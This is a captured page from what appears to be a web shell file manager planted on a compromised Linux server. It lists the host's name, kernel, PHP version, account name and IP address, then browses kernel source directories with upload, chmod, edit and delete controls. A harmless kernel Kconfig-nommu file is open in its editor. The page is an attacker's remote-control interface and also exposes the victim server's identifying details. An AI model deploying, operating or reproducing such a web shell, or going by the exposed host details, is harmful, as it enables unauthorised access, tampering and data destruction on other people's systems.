[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
arch
/
arm
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 boot
SET
[ DEL ]
📁 common
SET
[ DEL ]
📁 crypto
SET
[ DEL ]
📁 firmware
SET
[ DEL ]
📁 kernel
SET
[ DEL ]
📁 lib
SET
[ DEL ]
📁 mach-actions
SET
[ DEL ]
📁 mach-alpine
SET
[ DEL ]
📁 mach-artpec
SET
[ DEL ]
📁 mach-asm9260
SET
[ DEL ]
📁 mach-aspeed
SET
[ DEL ]
📁 mach-at91
SET
[ DEL ]
📁 mach-axxia
SET
[ DEL ]
📁 mach-bcm
SET
[ DEL ]
📁 mach-berlin
SET
[ DEL ]
📁 mach-clps711x
SET
[ DEL ]
📁 mach-cns3xxx
SET
[ DEL ]
📁 mach-davinci
SET
[ DEL ]
📁 mach-digicolor
SET
[ DEL ]
📁 mach-dove
SET
[ DEL ]
📁 mach-ebsa110
SET
[ DEL ]
📁 mach-efm32
SET
[ DEL ]
📁 mach-ep93xx
SET
[ DEL ]
📁 mach-exynos
SET
[ DEL ]
📁 mach-footbridge
SET
[ DEL ]
📁 mach-gemini
SET
[ DEL ]
📁 mach-highbank
SET
[ DEL ]
📁 mach-hisi
SET
[ DEL ]
📁 mach-imx
SET
[ DEL ]
📁 mach-integrator
SET
[ DEL ]
📁 mach-iop13xx
SET
[ DEL ]
📁 mach-iop32x
SET
[ DEL ]
📁 mach-iop33x
SET
[ DEL ]
📁 mach-ixp4xx
SET
[ DEL ]
📁 mach-keystone
SET
[ DEL ]
📁 mach-ks8695
SET
[ DEL ]
📁 mach-lpc18xx
SET
[ DEL ]
📁 mach-lpc32xx
SET
[ DEL ]
📁 mach-mediatek
SET
[ DEL ]
📁 mach-meson
SET
[ DEL ]
📁 mach-mmp
SET
[ DEL ]
📁 mach-moxart
SET
[ DEL ]
📁 mach-mv78xx0
SET
[ DEL ]
📁 mach-mvebu
SET
[ DEL ]
📁 mach-mxs
SET
[ DEL ]
📁 mach-netx
SET
[ DEL ]
📁 mach-nomadik
SET
[ DEL ]
📁 mach-npcm
SET
[ DEL ]
📁 mach-nspire
SET
[ DEL ]
📁 mach-omap1
SET
[ DEL ]
📁 mach-omap2
SET
[ DEL ]
📁 mach-orion5x
SET
[ DEL ]
📁 mach-oxnas
SET
[ DEL ]
📁 mach-picoxcell
SET
[ DEL ]
📁 mach-prima2
SET
[ DEL ]
📁 mach-pxa
SET
[ DEL ]
📁 mach-qcom
SET
[ DEL ]
📁 mach-realview
SET
[ DEL ]
📁 mach-rockchip
SET
[ DEL ]
📁 mach-rpc
SET
[ DEL ]
📁 mach-s3c24xx
SET
[ DEL ]
📁 mach-s3c64xx
SET
[ DEL ]
📁 mach-s5pv210
SET
[ DEL ]
📁 mach-sa1100
SET
[ DEL ]
📁 mach-shmobile
SET
[ DEL ]
📁 mach-socfpga
SET
[ DEL ]
📁 mach-spear
SET
[ DEL ]
📁 mach-sti
SET
[ DEL ]
📁 mach-stm32
SET
[ DEL ]
📁 mach-sunxi
SET
[ DEL ]
📁 mach-tango
SET
[ DEL ]
📁 mach-tegra
SET
[ DEL ]
📁 mach-u300
SET
[ DEL ]
📁 mach-uniphier
SET
[ DEL ]
📁 mach-ux500
SET
[ DEL ]
📁 mach-versatile
SET
[ DEL ]
📁 mach-vexpress
SET
[ DEL ]
📁 mach-vt8500
SET
[ DEL ]
📁 mach-w90x900
SET
[ DEL ]
📁 mach-zx
SET
[ DEL ]
📁 mach-zynq
SET
[ DEL ]
📁 mm
SET
[ DEL ]
📁 net
SET
[ DEL ]
📁 nwfpe
SET
[ DEL ]
📁 oprofile
SET
[ DEL ]
📁 plat-iop
SET
[ DEL ]
📁 plat-omap
SET
[ DEL ]
📁 plat-orion
SET
[ DEL ]
📁 plat-pxa
SET
[ DEL ]
📁 plat-samsung
SET
[ DEL ]
📁 plat-versatile
SET
[ DEL ]
📁 probes
SET
[ DEL ]
📁 tools
SET
[ DEL ]
📁 vdso
SET
[ DEL ]
📁 vfp
SET
[ DEL ]
📁 xen
SET
[ DEL ]
📄 Kconfig
67,675 B
SET
[ EDIT ]
|
[ DEL ]
📄 Kconfig-nommu
1,989 B
SET
[ EDIT ]
|
[ DEL ]
📄 Kconfig.debug
63,451 B
SET
[ EDIT ]
|
[ DEL ]
📄 Makefile
13,482 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Kconfig-nommu
# SPDX-License-Identifier: GPL-2.0 # # Kconfig for uClinux(non-paged MM) depend configurations # Hyok S. Choi <hyok.choi@samsung.com> # config SET_MEM_PARAM bool "Set flash/sdram size and base addr" help Say Y to manually set the base addresses and sizes. otherwise, the default values are assigned. config DRAM_BASE hex '(S)DRAM Base Address' if SET_MEM_PARAM default 0x00800000 config DRAM_SIZE hex '(S)DRAM SIZE' if SET_MEM_PARAM default 0x00800000 config FLASH_MEM_BASE hex 'FLASH Base Address' if SET_MEM_PARAM default 0x00400000 config FLASH_SIZE hex 'FLASH Size' if SET_MEM_PARAM default 0x00400000 config PROCESSOR_ID hex 'Hard wire the processor ID' default 0x00007700 depends on !(CPU_CP15 || CPU_V7M) help If processor has no CP15 register, this processor ID is used instead of the auto-probing which utilizes the register. config REMAP_VECTORS_TO_RAM bool 'Install vectors to the beginning of RAM' help The kernel needs to change the hardware exception vectors. In nommu mode, the hardware exception vectors are normally placed at address 0x00000000. However, this region may be occupied by read-only memory depending on H/W design. If the region contains read-write memory, say 'n' here. If your CPU provides a remap facility which allows the exception vectors to be mapped to writable memory, say 'n' here. Otherwise, say 'y' here. In this case, the kernel will require external support to redirect the hardware exception vectors to the writable versions located at DRAM_BASE. config ARM_MPU bool 'Use the ARM v7 PMSA Compliant MPU' depends on CPU_V7 || CPU_V7M default y if CPU_V7 help Some ARM systems without an MMU have instead a Memory Protection Unit (MPU) that defines the type and permissions for regions of memory. If your CPU has an MPU then you should choose 'y' here unless you know that you do not want to use the MPU.